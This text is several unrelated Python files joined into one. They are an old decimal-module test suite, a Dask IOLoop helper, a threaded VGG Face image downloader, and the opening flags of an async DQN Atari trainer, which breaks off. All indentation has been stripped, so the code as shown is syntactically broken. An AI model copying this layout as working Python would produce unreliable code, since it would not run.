# and Aahz (aahz at pobox.com)
# and Tim Peters
"""
These are the test cases for the Decimal module.
There are two groups of tests, Arithmetic and Behaviour. The former test
the Decimal arithmetic using the tests provided by Mike Cowlishaw. The latter
test the pythonic behaviour according to PEP 327.
Cowlishaw's tests can be downloaded from:
www2.hursley.ibm.com/decimal/dectest.zip
This test module can be called from command line with one parameter (Arithmetic
or Behaviour) to test each part, or without parameter to test both parts. If
you're working through IDLE, you can import this test module and call test_main()
with the corresponding argument.
"""
from __future__ import with_statement
import unittest
import glob
import os, sys
import pickle, copy
from decimal import *
from test.test_support import (TestSkipped, run_unittest, run_doctest,
is_resource_enabled)
import random
try:
import threading
except ImportError:
threading = None
# Useful Test Constant
Signals = getcontext().flags.keys()
# Tests are built around these assumed context defaults.
# test_main() restores the original context.
def init():
global ORIGINAL_CONTEXT
ORIGINAL_CONTEXT = getcontext().copy()
DefaultContext.prec = 9
DefaultContext.rounding = ROUND_HALF_EVEN
DefaultContext.traps = dict.fromkeys(Signals, 0)
setcontext(DefaultContext)
TESTDATADIR = 'decimaltestdata'
if __name__ == '__main__':
file = sys.argv[0]
else:
file = __file__
testdir = os.path.dirname(file) or os.curdir
directory = testdir + os.sep + TESTDATADIR + os.sep
skip_expected = not os.path.isdir(directory)
# Make sure it actually raises errors when not expected and caught in flags
# Slower, since it runs some things several times.
EXTENDEDERRORTEST = False
#Map the test cases' error names to the actual errors
ErrorNames = {'clamped' : Clamped,
'conversion_syntax' : InvalidOperation,
'division_by_zero' : DivisionByZero,
'division_impossible' : InvalidOperation,
'division_undefined' : InvalidOperation,
'inexact' : Inexact,
'invalid_context' : InvalidOperation,
'invalid_operation' : InvalidOperation,
'overflow' : Overflow,
'rounded' : Rounded,
'subnormal' : Subnormal,
'underflow' : Underflow}
def Nonfunction(*args):
"""Doesn't do anything."""
return None
RoundingDict = {'ceiling' : ROUND_CEILING, #Maps test-case names to roundings.
'down' : ROUND_DOWN,
'floor' : ROUND_FLOOR,
'half_down' : ROUND_HALF_DOWN,
'half_even' : ROUND_HALF_EVEN,
'half_up' : ROUND_HALF_UP,
'up' : ROUND_UP}
# Name adapter to be able to change the Decimal and Context
# interface without changing the test files from Cowlishaw
nameAdapter = {'toeng':'to_eng_string',
'tosci':'to_sci_string',
'samequantum':'same_quantum',
'tointegral':'to_integral',
'remaindernear':'remainder_near',
'divideint':'divide_int',
'squareroot':'sqrt',
'apply':'_apply',
}
class DecimalTest(unittest.TestCase):
"""Class which tests the Decimal class against the test cases.
Changed for unittest.
"""
def setUp(self):
self.context = Context()
for key in DefaultContext.traps.keys():
DefaultContext.traps[key] = 1
self.ignore_list = ['#']
# Basically, a # means return NaN InvalidOperation.
# Different from a sNaN in trim
self.ChangeDict = {'precision' : self.change_precision,
'rounding' : self.change_rounding_method,
'maxexponent' : self.change_max_exponent,
'minexponent' : self.change_min_exponent,
'clamp' : self.change_clamp}
def tearDown(self):
"""Cleaning up enviroment."""
# leaving context in original state
for key in DefaultContext.traps.keys():
DefaultContext.traps[key] = 0
return
def eval_file(self, file):
global skip_expected
if skip_expected:
raise TestSkipped
return
for line in open(file).xreadlines():
line = line.replace('\r\n', '').replace('\n', '')
#print line
try:
t = self.eval_line(line)
except InvalidOperation:
print 'Error in test cases:'
print line
continue
except DecimalException, exception:
#Exception raised where there shoudn't have been one.
self.fail('Exception "'+exception.__class__.__name__ + '" raised on line '+line)
return
def eval_line(self, s):
if s.find(' -> ') >= 0 and s[:2] != '--' and not s.startswith(' --'):
s = (s.split('->')[0] + '->' +
s.split('->')[1].split('--')[0]).strip()
else:
s = s.split('--')[0].strip()
for ignore in self.ignore_list:
if s.find(ignore) >= 0:
#print s.split()[0], 'NotImplemented--', ignore
return
if not s:
return
elif ':' in s:
return self.eval_directive(s)
else:
return self.eval_equation(s)
def eval_directive(self, s):
funct, value = map(lambda x: x.strip().lower(), s.split(':'))
if funct == 'rounding':
value = RoundingDict[value]
else:
try:
value = int(value)
except ValueError:
pass
funct = self.ChangeDict.get(funct, Nonfunction)
funct(value)
def eval_equation(self, s):
#global DEFAULT_PRECISION
#print DEFAULT_PRECISION
if not TEST_ALL and random.random() < 0.90:
return
try:
Sides = s.split('->')
L = Sides[0].strip().split()
id = L[0]
# print id,
funct = L[1].lower()
valstemp = L[2:]
L = Sides[1].strip().split()
ans = L[0]
exceptions = L[1:]
except (TypeError, AttributeError, IndexError):
raise InvalidOperation
def FixQuotes(val):
val = val.replace("''", 'SingleQuote').replace('""', 'DoubleQuote')
val = val.replace("'", '').replace('"', '')
val = val.replace('SingleQuote', "'").replace('DoubleQuote', '"')
return val
fname = nameAdapter.get(funct, funct)
if fname == 'rescale':
return
funct = getattr(self.context, fname)
vals = []
conglomerate = ''
quote = 0
theirexceptions = [ErrorNames[x.lower()] for x in exceptions]
for exception in Signals:
self.context.traps[exception] = 1 #Catch these bugs...
for exception in theirexceptions:
self.context.traps[exception] = 0
for i, val in enumerate(valstemp):
if val.count("'") % 2 == 1:
quote = 1 - quote
if quote:
conglomerate = conglomerate + ' ' + val
continue
else:
val = conglomerate + val
conglomerate = ''
v = FixQuotes(val)
if fname in ('to_sci_string', 'to_eng_string'):
if EXTENDEDERRORTEST:
for error in theirexceptions:
self.context.traps[error] = 1
try:
funct(self.context.create_decimal(v))
except error:
pass
except Signals, e:
self.fail("Raised %s in %s when %s disabled" % \
(e, s, error))
else:
self.fail("Did not raise %s in %s" % (error, s))
self.context.traps[error] = 0
v = self.context.create_decimal(v)
else:
v = Decimal(v)
vals.append(v)
ans = FixQuotes(ans)
if EXTENDEDERRORTEST and fname not in ('to_sci_string', 'to_eng_string'):
for error in theirexceptions:
self.context.traps[error] = 1
try:
funct(*vals)
except error:
pass
except Signals, e:
self.fail("Raised %s in %s when %s disabled" % \
(e, s, error))
else:
self.fail("Did not raise %s in %s" % (error, s))
self.context.traps[error] = 0
try:
result = str(funct(*vals))
if fname == 'same_quantum':
result = str(int(eval(result))) # 'True', 'False' -> '1', '0'
except Signals, error:
self.fail("Raised %s in %s" % (error, s))
except: #Catch any error long enough to state the test case.
print "ERROR:", s
raise
myexceptions = self.getexceptions()
self.context.clear_flags()
myexceptions.sort()
theirexceptions.sort()
self.assertEqual(result, ans,
'Incorrect answer for ' + s + ' -- got ' + result)
self.assertEqual(myexceptions, theirexceptions,
'Incorrect flags set in ' + s + ' -- got ' \
+ str(myexceptions))
return
def getexceptions(self):
return [e for e in Signals if self.context.flags[e]]
def change_precision(self, prec):
self.context.prec = prec
def change_rounding_method(self, rounding):
self.context.rounding = rounding
def change_min_exponent(self, exp):
self.context.Emin = exp
def change_max_exponent(self, exp):
self.context.Emax = exp
def change_clamp(self, clamp):
self.context._clamp = clamp
# Dynamically build custom test definition for each file in the test
# directory and add the definitions to the DecimalTest class. This
# procedure insures that new files do not get skipped.
for filename in os.listdir(directory):
if '.decTest' not in filename:
continue
head, tail = filename.split('.')
tester = lambda self, f=filename: self.eval_file(directory + f)
setattr(DecimalTest, 'test_' + head, tester)
del filename, head, tail, tester
# The following classes test the behaviour of Decimal according to PEP 327
class DecimalExplicitConstructionTest(unittest.TestCase):
'''Unit tests for Explicit Construction cases of Decimal.'''
def test_explicit_empty(self):
self.assertEqual(Decimal(), Decimal("0"))
def test_explicit_from_None(self):
self.assertRaises(TypeError, Decimal, None)
def test_explicit_from_int(self):
#positive
d = Decimal(45)
self.assertEqual(str(d), '45')
#very large positive
d = Decimal(500000123)
self.assertEqual(str(d), '500000123')
#negative
d = Decimal(-45)
self.assertEqual(str(d), '-45')
#zero
d = Decimal(0)
self.assertEqual(str(d), '0')
def test_explicit_from_string(self):
#empty
self.assertEqual(str(Decimal('')), 'NaN')
#int
self.assertEqual(str(Decimal('45')), '45')
#float
self.assertEqual(str(Decimal('45.34')), '45.34')
#engineer notation
self.assertEqual(str(Decimal('45e2')), '4.5E+3')
#just not a number
self.assertEqual(str(Decimal('ugly')), 'NaN')
def test_explicit_from_tuples(self):
#zero
d = Decimal( (0, (0,), 0) )
self.assertEqual(str(d), '0')
#int
d = Decimal( (1, (4, 5), 0) )
self.assertEqual(str(d), '-45')
#float
d = Decimal( (0, (4, 5, 3, 4), -2) )
self.assertEqual(str(d), '45.34')
#weird
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.34913534E-17')
#wrong number of items
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1)) )
#bad sign
self.assertRaises(ValueError, Decimal, (8, (4, 3, 4, 9, 1), 2) )
#bad exp
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), 'wrong!') )
#bad coefficients
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, None, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, -3, 4, 9, 1), 2) )
def test_explicit_from_Decimal(self):
#positive
d = Decimal(45)
e = Decimal(d)
self.assertEqual(str(e), '45')
self.assertNotEqual(id(d), id(e))
#very large positive
d = Decimal(500000123)
e = Decimal(d)
self.assertEqual(str(e), '500000123')
self.assertNotEqual(id(d), id(e))
#negative
d = Decimal(-45)
e = Decimal(d)
self.assertEqual(str(e), '-45')
self.assertNotEqual(id(d), id(e))
#zero
d = Decimal(0)
e = Decimal(d)
self.assertEqual(str(e), '0')
self.assertNotEqual(id(d), id(e))
def test_explicit_context_create_decimal(self):
nc = copy.copy(getcontext())
nc.prec = 3
# empty
d = Decimal()
self.assertEqual(str(d), '0')
d = nc.create_decimal()
self.assertEqual(str(d), '0')
# from None
self.assertRaises(TypeError, nc.create_decimal, None)
# from int
d = nc.create_decimal(456)
self.failUnless(isinstance(d, Decimal))
self.assertEqual(nc.create_decimal(45678),
nc.create_decimal('457E+2'))
# from string
d = Decimal('456789')
self.assertEqual(str(d), '456789')
d = nc.create_decimal('456789')
self.assertEqual(str(d), '4.57E+5')
# from tuples
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.34913534E-17')
d = nc.create_decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.35E-17')
# from Decimal
prevdec = Decimal(500000123)
d = Decimal(prevdec)
self.assertEqual(str(d), '500000123')
d = nc.create_decimal(prevdec)
self.assertEqual(str(d), '5.00E+8')
class DecimalImplicitConstructionTest(unittest.TestCase):
'''Unit tests for Implicit Construction cases of Decimal.'''
def test_implicit_from_None(self):
self.assertRaises(TypeError, eval, 'Decimal(5) + None', globals())
def test_implicit_from_int(self):
#normal
self.assertEqual(str(Decimal(5) + 45), '50')
#exceeding precision
self.assertEqual(Decimal(5) + 123456789000, Decimal(123456789000))
def test_implicit_from_string(self):
self.assertRaises(TypeError, eval, 'Decimal(5) + "3"', globals())
def test_implicit_from_float(self):
self.assertRaises(TypeError, eval, 'Decimal(5) + 2.2', globals())
def test_implicit_from_Decimal(self):
self.assertEqual(Decimal(5) + Decimal(45), Decimal(50))
def test_rop(self):
# Allow other classes to be trained to interact with Decimals
class E:
def __divmod__(self, other):
return 'divmod ' + str(other)
def __rdivmod__(self, other):
return str(other) + ' rdivmod'
def __lt__(self, other):
return 'lt ' + str(other)
def __gt__(self, other):
return 'gt ' + str(other)
def __le__(self, other):
return 'le ' + str(other)
def __ge__(self, other):
return 'ge ' + str(other)
def __eq__(self, other):
return 'eq ' + str(other)
def __ne__(self, other):
return 'ne ' + str(other)
self.assertEqual(divmod(E(), Decimal(10)), 'divmod 10')
self.assertEqual(divmod(Decimal(10), E()), '10 rdivmod')
self.assertEqual(eval('Decimal(10) < E()'), 'gt 10')
self.assertEqual(eval('Decimal(10) > E()'), 'lt 10')
self.assertEqual(eval('Decimal(10) <= E()'), 'ge 10')
self.assertEqual(eval('Decimal(10) >= E()'), 'le 10')
self.assertEqual(eval('Decimal(10) == E()'), 'eq 10')
self.assertEqual(eval('Decimal(10) != E()'), 'ne 10')
# insert operator methods and then exercise them
oplist = [
('+', '__add__', '__radd__'),
('-', '__sub__', '__rsub__'),
('*', '__mul__', '__rmul__'),
('%', '__mod__', '__rmod__'),
('//', '__floordiv__', '__rfloordiv__'),
('**', '__pow__', '__rpow__')
]
if 1/2 == 0:
# testing with classic division, so add __div__
oplist.append(('/', '__div__', '__rdiv__'))
else:
# testing with -Qnew, so add __truediv__
oplist.append(('/', '__truediv__', '__rtruediv__'))
for sym, lop, rop in oplist:
setattr(E, lop, lambda self, other: 'str' + lop + str(other))
setattr(E, rop, lambda self, other: str(other) + rop + 'str')
self.assertEqual(eval('E()' + sym + 'Decimal(10)'),
'str' + lop + '10')
self.assertEqual(eval('Decimal(10)' + sym + 'E()'),
'10' + rop + 'str')
class DecimalArithmeticOperatorsTest(unittest.TestCase):
'''Unit tests for all arithmetic operators, binary and unary.'''
def test_addition(self):
d1 = Decimal('-11.1')
d2 = Decimal('22.2')
#two Decimals
self.assertEqual(d1+d2, Decimal('11.1'))
self.assertEqual(d2+d1, Decimal('11.1'))
#with other type, left
c = d1 + 5
self.assertEqual(c, Decimal('-6.1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 + d1
self.assertEqual(c, Decimal('-6.1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 += d2
self.assertEqual(d1, Decimal('11.1'))
#inline with other type
d1 += 5
self.assertEqual(d1, Decimal('16.1'))
def test_subtraction(self):
d1 = Decimal('-11.1')
d2 = Decimal('22.2')
#two Decimals
self.assertEqual(d1-d2, Decimal('-33.3'))
self.assertEqual(d2-d1, Decimal('33.3'))
#with other type, left
c = d1 - 5
self.assertEqual(c, Decimal('-16.1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 - d1
self.assertEqual(c, Decimal('16.1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 -= d2
self.assertEqual(d1, Decimal('-33.3'))
#inline with other type
d1 -= 5
self.assertEqual(d1, Decimal('-38.3'))
def test_multiplication(self):
d1 = Decimal('-5')
d2 = Decimal('3')
#two Decimals
self.assertEqual(d1*d2, Decimal('-15'))
self.assertEqual(d2*d1, Decimal('-15'))
#with other type, left
c = d1 * 5
self.assertEqual(c, Decimal('-25'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 * d1
self.assertEqual(c, Decimal('-25'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 *= d2
self.assertEqual(d1, Decimal('-15'))
#inline with other type
d1 *= 5
self.assertEqual(d1, Decimal('-75'))
def test_division(self):
d1 = Decimal('-5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1/d2, Decimal('-2.5'))
self.assertEqual(d2/d1, Decimal('-0.4'))
#with other type, left
c = d1 / 4
self.assertEqual(c, Decimal('-1.25'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 4 / d1
self.assertEqual(c, Decimal('-0.8'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 /= d2
self.assertEqual(d1, Decimal('-2.5'))
#inline with other type
d1 /= 4
self.assertEqual(d1, Decimal('-0.625'))
def test_floor_division(self):
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1//d2, Decimal('2'))
self.assertEqual(d2//d1, Decimal('0'))
#with other type, left
c = d1 // 4
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 // d1
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 //= d2
self.assertEqual(d1, Decimal('2'))
#inline with other type
d1 //= 2
self.assertEqual(d1, Decimal('1'))
def test_powering(self):
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1**d2, Decimal('25'))
self.assertEqual(d2**d1, Decimal('32'))
#with other type, left
c = d1 ** 4
self.assertEqual(c, Decimal('625'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 ** d1
self.assertEqual(c, Decimal('16807'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 **= d2
self.assertEqual(d1, Decimal('25'))
#inline with other type
d1 **= 4
self.assertEqual(d1, Decimal('390625'))
def test_module(self):
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1%d2, Decimal('1'))
self.assertEqual(d2%d1, Decimal('2'))
#with other type, left
c = d1 % 4
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 % d1
self.assertEqual(c, Decimal('2'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 %= d2
self.assertEqual(d1, Decimal('1'))
#inline with other type
d1 %= 4
self.assertEqual(d1, Decimal('1'))
def test_floor_div_module(self):
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
(p, q) = divmod(d1, d2)
self.assertEqual(p, Decimal('2'))
self.assertEqual(q, Decimal('1'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
#with other type, left
(p, q) = divmod(d1, 4)
self.assertEqual(p, Decimal('1'))
self.assertEqual(q, Decimal('1'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
#with other type, right
(p, q) = divmod(7, d1)
self.assertEqual(p, Decimal('1'))
self.assertEqual(q, Decimal('2'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
def test_unary_operators(self):
self.assertEqual(+Decimal(45), Decimal(+45)) # +
self.assertEqual(-Decimal(45), Decimal(-45)) # -
self.assertEqual(abs(Decimal(45)), abs(Decimal(-45))) # abs
# The following are two functions used to test threading in the next class
def thfunc1(cls):
d1 = Decimal(1)
d3 = Decimal(3)
cls.assertEqual(d1/d3, Decimal('0.333333333'))
cls.synchro.wait()
cls.assertEqual(d1/d3, Decimal('0.333333333'))
cls.finish1.set()
return
def thfunc2(cls):
d1 = Decimal(1)
d3 = Decimal(3)
cls.assertEqual(d1/d3, Decimal('0.333333333'))
thiscontext = getcontext()
thiscontext.prec = 18
cls.assertEqual(d1/d3, Decimal('0.333333333333333333'))
cls.synchro.set()
cls.finish2.set()
return
class DecimalUseOfContextTest(unittest.TestCase):
'''Unit tests for Use of Context cases in Decimal.'''
try:
import threading
except ImportError:
threading = None
# Take care executing this test from IDLE, there's an issue in threading
# that hangs IDLE and I couldn't find it
def test_threading(self):
#Test the "threading isolation" of a Context.
self.synchro = threading.Event()
self.finish1 = threading.Event()
self.finish2 = threading.Event()
th1 = threading.Thread(target=thfunc1, args=(self,))
th2 = threading.Thread(target=thfunc2, args=(self,))
th1.start()
th2.start()
self.finish1.wait()
self.finish1.wait()
return
if threading is None:
del test_threading
class DecimalUsabilityTest(unittest.TestCase):
'''Unit tests for Usability cases of Decimal.'''
def test_comparison_operators(self):
da = Decimal('23.42')
db = Decimal('23.42')
dc = Decimal('45')
#two Decimals
self.failUnless(dc > da)
self.failUnless(dc >= da)
self.failUnless(da < dc)
self.failUnless(da <= dc)
self.failUnless(da == db)
self.failUnless(da != dc)
self.failUnless(da <= db)
self.failUnless(da >= db)
self.assertEqual(cmp(dc,da), 1)
self.assertEqual(cmp(da,dc), -1)
self.assertEqual(cmp(da,db), 0)
#a Decimal and an int
self.failUnless(dc > 23)
self.failUnless(23 < dc)
self.failUnless(dc == 45)
self.assertEqual(cmp(dc,23), 1)
self.assertEqual(cmp(23,dc), -1)
self.assertEqual(cmp(dc,45), 0)
#a Decimal and uncomparable
self.assertNotEqual(da, 'ugly')
self.assertNotEqual(da, 32.7)
self.assertNotEqual(da, object())
self.assertNotEqual(da, object)
# sortable
a = map(Decimal, xrange(100))
b = a[:]
random.shuffle(a)
a.sort()
self.assertEqual(a, b)
def test_copy_and_deepcopy_methods(self):
d = Decimal('43.24')
c = copy.copy(d)
self.assertEqual(id(c), id(d))
dc = copy.deepcopy(d)
self.assertEqual(id(dc), id(d))
def test_hash_method(self):
#just that it's hashable
hash(Decimal(23))
#the same hash that to an int
self.assertEqual(hash(Decimal(23)), hash(23))
self.assertRaises(TypeError, hash, Decimal('NaN'))
self.assert_(hash(Decimal('Inf')))
self.assert_(hash(Decimal('-Inf')))
def test_min_and_max_methods(self):
d1 = Decimal('15.32')
d2 = Decimal('28.5')
l1 = 15
l2 = 28
#between Decimals
self.failUnless(min(d1,d2) is d1)
self.failUnless(min(d2,d1) is d1)
self.failUnless(max(d1,d2) is d2)
self.failUnless(max(d2,d1) is d2)
#between Decimal and long
self.failUnless(min(d1,l2) is d1)
self.failUnless(min(l2,d1) is d1)
self.failUnless(max(l1,d2) is d2)
self.failUnless(max(d2,l1) is d2)
def test_as_nonzero(self):
#as false
self.failIf(Decimal(0))
#as true
self.failUnless(Decimal('0.372'))
def test_tostring_methods(self):
#Test str and repr methods.
d = Decimal('15.32')
self.assertEqual(str(d), '15.32') # str
self.assertEqual(repr(d), 'Decimal("15.32")') # repr
def test_tonum_methods(self):
#Test float, int and long methods.
d1 = Decimal('66')
d2 = Decimal('15.32')
#int
self.assertEqual(int(d1), 66)
self.assertEqual(int(d2), 15)
#long
self.assertEqual(long(d1), 66)
self.assertEqual(long(d2), 15)
#float
self.assertEqual(float(d1), 66)
self.assertEqual(float(d2), 15.32)
def test_eval_round_trip(self):
#with zero
d = Decimal( (0, (0,), 0) )
self.assertEqual(d, eval(repr(d)))
#int
d = Decimal( (1, (4, 5), 0) )
self.assertEqual(d, eval(repr(d)))
#float
d = Decimal( (0, (4, 5, 3, 4), -2) )
self.assertEqual(d, eval(repr(d)))
#weird
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(d, eval(repr(d)))
def test_as_tuple(self):
#with zero
d = Decimal(0)
self.assertEqual(d.as_tuple(), (0, (0,), 0) )
#int
d = Decimal(-45)
self.assertEqual(d.as_tuple(), (1, (4, 5), 0) )
#complicated string
d = Decimal("-4.34913534E-17")
self.assertEqual(d.as_tuple(), (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
#inf
d = Decimal("Infinity")
self.assertEqual(d.as_tuple(), (0, (0,), 'F') )
def test_immutability_operations(self):
# Do operations and check that it didn't change change internal objects.
d1 = Decimal('-25e55')
b1 = Decimal('-25e55')
d2 = Decimal('33e-33')
b2 = Decimal('33e-33')
def checkSameDec(operation, useOther=False):
if useOther:
eval("d1." + operation + "(d2)")
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
self.assertEqual(d2._sign, b2._sign)
self.assertEqual(d2._int, b2._int)
self.assertEqual(d2._exp, b2._exp)
else:
eval("d1." + operation + "()")
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
return
Decimal(d1)
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
checkSameDec("__abs__")
checkSameDec("__add__", True)
checkSameDec("__div__", True)
checkSameDec("__divmod__", True)
checkSameDec("__cmp__", True)
checkSameDec("__float__")
checkSameDec("__floordiv__", True)
checkSameDec("__hash__")
checkSameDec("__int__")
checkSameDec("__long__")
checkSameDec("__mod__", True)
checkSameDec("__mul__", True)
checkSameDec("__neg__")
checkSameDec("__nonzero__")
checkSameDec("__pos__")
checkSameDec("__pow__", True)
checkSameDec("__radd__", True)
checkSameDec("__rdiv__", True)
checkSameDec("__rdivmod__", True)
checkSameDec("__repr__")
checkSameDec("__rfloordiv__", True)
checkSameDec("__rmod__", True)
checkSameDec("__rmul__", True)
checkSameDec("__rpow__", True)
checkSameDec("__rsub__", True)
checkSameDec("__str__")
checkSameDec("__sub__", True)
checkSameDec("__truediv__", True)
checkSameDec("adjusted")
checkSameDec("as_tuple")
checkSameDec("compare", True)
checkSameDec("max", True)
checkSameDec("min", True)
checkSameDec("normalize")
checkSameDec("quantize", True)
checkSameDec("remainder_near", True)
checkSameDec("same_quantum", True)
checkSameDec("sqrt")
checkSameDec("to_eng_string")
checkSameDec("to_integral")
class DecimalPythonAPItests(unittest.TestCase):
def test_pickle(self):
d = Decimal('-3.141590000')
p = pickle.dumps(d)
e = pickle.loads(p)
self.assertEqual(d, e)
def test_int(self):
for x in range(-250, 250):
s = '%0.2f' % (x / 100.0)
# should work the same as for floats
self.assertEqual(int(Decimal(s)), int(float(s)))
# should work the same as to_integral in the ROUND_DOWN mode
d = Decimal(s)
r = d.to_integral(ROUND_DOWN)
self.assertEqual(Decimal(int(d)), r)
class ContextAPItests(unittest.TestCase):
def test_pickle(self):
c = Context()
e = pickle.loads(pickle.dumps(c))
for k in vars(c):
v1 = vars(c)[k]
v2 = vars(e)[k]
self.assertEqual(v1, v2)
def test_equality_with_other_types(self):
self.assert_(Decimal(10) in ['a', 1.0, Decimal(10), (1,2), {}])
self.assert_(Decimal(10) not in ['a', 1.0, (1,2), {}])
def test_copy(self):
# All copies should be deep
c = Context()
d = c.copy()
self.assertNotEqual(id(c), id(d))
self.assertNotEqual(id(c.flags), id(d.flags))
self.assertNotEqual(id(c.traps), id(d.traps))
class WithStatementTest(unittest.TestCase):
# Can't do these as docstrings until Python 2.6
# as doctest can't handle __future__ statements
def test_localcontext(self):
# Use a copy of the current context in the block
orig_ctx = getcontext()
with localcontext() as enter_ctx:
set_ctx = getcontext()
final_ctx = getcontext()
self.assert_(orig_ctx is final_ctx, 'did not restore context correctly')
self.assert_(orig_ctx is not set_ctx, 'did not copy the context')
self.assert_(set_ctx is enter_ctx, '__enter__ returned wrong context')
def test_localcontextarg(self):
# Use a copy of the supplied context in the block
orig_ctx = getcontext()
new_ctx = Context(prec=42)
with localcontext(new_ctx) as enter_ctx:
set_ctx = getcontext()
final_ctx = getcontext()
self.assert_(orig_ctx is final_ctx, 'did not restore context correctly')
self.assert_(set_ctx.prec == new_ctx.prec, 'did not set correct context')
self.assert_(new_ctx is not set_ctx, 'did not copy the context')
self.assert_(set_ctx is enter_ctx, '__enter__ returned wrong context')
def test_main(arith=False, verbose=None):
""" Execute the tests.
Runs all arithmetic tests if arith is True or if the "decimal" resource
is enabled in regrtest.py
"""
init()
global TEST_ALL
TEST_ALL = arith or is_resource_enabled('decimal')
test_classes = [
DecimalExplicitConstructionTest,
DecimalImplicitConstructionTest,
DecimalArithmeticOperatorsTest,
DecimalUseOfContextTest,
DecimalUsabilityTest,
DecimalPythonAPItests,
ContextAPItests,
DecimalTest,
WithStatementTest,
]
try:
run_unittest(*test_classes)
import decimal as DecimalModule
run_doctest(DecimalModule, verbose)
finally:
setcontext(ORIGINAL_CONTEXT)
if __name__ == '__main__':
# Calling with no arguments runs all tests.
# Calling with "Skip" will skip over 90% of the arithmetic tests.
if len(sys.argv) == 1:
test_main(arith=True, verbose=True)
elif len(sys.argv) == 2:
arith = sys.argv[1].lower() != 'skip'
test_main(arith=arith, verbose=True)
else:
raise ValueError("test called with wrong arguments, use test_Decimal [Skip]")
|
dask_io_loop.py | import distributed
from tornado.ioloop import IOLoop
from threading import Thread
from distributed import Scheduler, Worker, Executor
import logging
import atexit
distributed.core.logging.propagate = False
__ioloop__ = IOLoop()
class DaskLoop():
def __init__(self):
self.loop = __ioloop__
self.t = Thread(target=self.loop.start)
self.t.start()
#def close_ioloop():
# print "closing..."
# __ioloop__.close()
#atexit.register(close_ioloop)
#print "registering.."
|
download_vggface_dataset.py | #!/usr/bin/python3
# -*- coding: utf-8 -*-
import sys
import os
import threading
import socket
import urllib.request
timeout = 1
socket.setdefaulttimeout(timeout)
save_path = '/media/taotao/2T/vgg_face_dataset/'
def download_and_save(url, savename):
try:
data = urllib.request.urlopen(url).read()
fid = open(savename, 'w+b')
fid.write(data)
print("download succeed: " + url)
fid.close()
except IOError:
print("download failed: " + url)
def get_all_iamge(filename):
fid = open(filename)
name = filename.split('/')[-1]
name = name[:-4]
lines = fid.readlines()
fid.close()
for line in lines:
line_split = line.split(' ')
image_id = line_split[0]
image_url = line_split[1]
if not os.path.exists(f'{save_path}/' + name):
os.mkdir(f'{save_path}/' + name)
savefile = f'{save_path}/' + name + '/' + image_id + '.jpg'
# The maxSize of Thread numberr:1000
print(image_url, savefile)
while True:
if (len(threading.enumerate()) < 1000):
break
t = threading.Thread(target=download_and_save, args=(image_url, savefile,))
t.start()
if __name__ == "__main__":
fileDir = '/home/taotao/Downloads/vgg_face_dataset/files/'
names = os.listdir(fileDir)
for i in range(len(names)):
get_all_iamge(os.path.join(fileDir, names[i]))
|
async_dqn.py | #!/usr/bin/env python
import os
os.environ["KERAS_BACKEND"] = "tensorflow"
from skimage.transform import resize
from skimage.color import rgb2gray
from atari_environment import AtariEnvironment
import threading
import tensorflow as tf
import sys
import random
import numpy as np
import time
import gym
from keras import backend as K
from model import build_network
from keras import backend as K
flags = tf.app.flags
flags.DEFINE_string('experiment', 'dqn_breakout', 'Name of the current experiment')
flags.DEFINE_string('game', 'Breakout-v0', 'Name of the atari game to play. Full list here: https://gym.openai.com/envs#atari')
flags.DEFINE_integer('num_concurrent', 8, 'Number of concurrent actor-learner threads to use during training.')
flags.DEFINE_integer('tmax', 80000000, 'Number of training timesteps.')
flags.DEFINE_integer('resized_width', 84, 'Scale screen to this width.')
flags.DEFINE_integer('resized_height', 84, 'Scale screen to this height.')
flags.DEFINE_integer('agent_history_length', 4, 'Use this number of recent screens as the environment state.')
flags.DEFINE_integer('network_update_frequency', 32, 'Frequency with which each actor learner thread does an async gradient update')
flags.DEFINE_integer('target_network_update_frequency', 10000, 'Reset the target network every n timesteps')
flags.DEFINE_float('learning_rate', 0.0001, 'Initial learning rate.')
flags.DEFINE_float('gamma', 0.99, 'Reward discount rate.')
flags.DEFINE_integer('anneal_epsilon_timesteps', 1000000, 'Number of timesteps to anneal epsilon.')
flags.DEFINE_string('summary_dir', '/tmp/summaries', 'Directory for storing tensorboard summaries')
